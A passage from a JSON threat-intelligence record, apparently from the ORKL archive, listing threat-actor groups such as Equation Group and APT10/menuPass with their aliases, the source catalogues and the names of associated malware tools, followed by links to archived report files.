			],
			"source_name": "MISPGALAXY:Witchetty",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "08623296-52be-4977-8622-50efda44e9cc",
			"created_at": "2023-01-06T13:46:38.549387Z",
			"updated_at": "2026-04-10T02:00:03.020003Z",
			"deleted_at": null,
			"main_name": "Equation Group",
			"aliases": [
				"Tilded Team",
				"EQGRP",
				"G0020"
			],
			"source_name": "MISPGALAXY:Equation Group",
			"tools": [
				"TripleFantasy",
				"GrayFish",
				"EquationLaser",
				"EquationDrug",
				"DoubleFantasy"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "2d9fbbd7-e4c3-40e5-b751-27af27c8610b",
			"created_at": "2024-05-01T02:03:08.144214Z",
			"updated_at": "2026-04-10T02:00:03.674763Z",
			"deleted_at": null,
			"main_name": "PLATINUM COLONY",
			"aliases": [
				"Equation Group "
			],
			"source_name": "Secureworks:PLATINUM COLONY",
			"tools": [
				"DoubleFantasy",
				"EquationDrug",
				"EquationLaser",
				"Fanny",
				"GrayFish",
				"TripleFantasy"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ba9fa308-a29a-4928-9c06-73aafec7624c",
			"created_at": "2024-05-01T02:03:07.981061Z",
			"updated_at": "2026-04-10T02:00:03.750803Z",
			"deleted_at": null,
			"main_name": "BRONZE RIVERSIDE",
			"aliases": [
				"APT10 ",
				"CTG-5938 ",
				"CVNX ",
				"Hogfish ",
				"MenuPass ",
				"MirrorFace ",
				"POTASSIUM ",
				"Purple Typhoon ",
				"Red Apollo ",
				"Stone Panda "
			],
			"source_name": "Secureworks:BRONZE RIVERSIDE",
			"tools": [
				"ANEL",
				"AsyncRAT",
				"ChChes",
				"Cobalt Strike",
				"HiddenFace",
				"LODEINFO",
				"PlugX",
				"PoisonIvy",
				"QuasarRAT",
				"QuasarRAT Loader",
				"RedLeaves"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "e0fed6e6-a593-4041-80ef-694261825937",
			"created_at": "2022-10-25T16:07:23.593572Z",
			"updated_at": "2026-04-10T02:00:04.680752Z",
			"deleted_at": null,
			"main_name": "Equation Group",
			"aliases": [
				"APT-C-40",
				"G0020",
				"Platinum Colony",
				"Tilded Team"
			],
			"source_name": "ETDA:Equation Group",
			"tools": [
				"Bvp47",
				"DEMENTIAWHEEL",
				"DOUBLEFANTASY",
				"DanderSpritz",
				"DarkPulsar",
				"DoubleFantasy",
				"DoubleFeature",
				"DoublePulsar",
				"Duqu",
				"EQUATIONDRUG",
				"EQUATIONLASER",
				"EQUESTRE",
				"Flamer",
				"GRAYFISH",
				"GROK",
				"OddJob",
				"Plexor",
				"Prax",
				"Regin",
				"Skywiper",
				"TRIPLEFANTASY",
				"Tilded",
				"UNITEDRAKE",
				"WarriorPride",
				"sKyWIper"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "ba3fff0c-3ba0-4855-9eeb-1af9ee18136a",
			"created_at": "2022-10-25T15:50:23.298889Z",
			"updated_at": "2026-04-10T02:00:05.316886Z",
			"deleted_at": null,
			"main_name": "menuPass",
			"aliases": [
				"menuPass",
				"POTASSIUM",
				"Stone Panda",
				"APT10",
				"Red Apollo",
				"CVNX",
				"HOGFISH",
				"BRONZE RIVERSIDE"
			],
			"source_name": "MITRE:menuPass",
			"tools": [
				"certutil",
				"FYAnti",
				"UPPERCUT",
				"SNUGRIDE",
				"P8RAT",
				"RedLeaves",
				"SodaMaster",
				"pwdump",
				"Mimikatz",
				"PlugX",
				"PowerSploit",
				"ChChes",
				"cmd",
				"QuasarRAT",
				"AdFind",
				"Cobalt Strike",
				"PoisonIvy",
				"EvilGrab",
				"esentutl",
				"Impacket",
				"Ecipekac",
				"PsExec",
				"HUI Loader"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434608,
	"ts_updated_at": 1775792025,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/87d35f03223812c5b64a7ffcc39fbbcef645e5b9.pdf",
		"text": "https://archive.orkl.eu/87d35f03223812c5b64a7ffcc39fbbcef645e5b9.txt",
		"img": "https://archive.orkl.eu/87d35f03223812c5b64a7ffcc39fbbcef645e5b9.jpg"
	}
}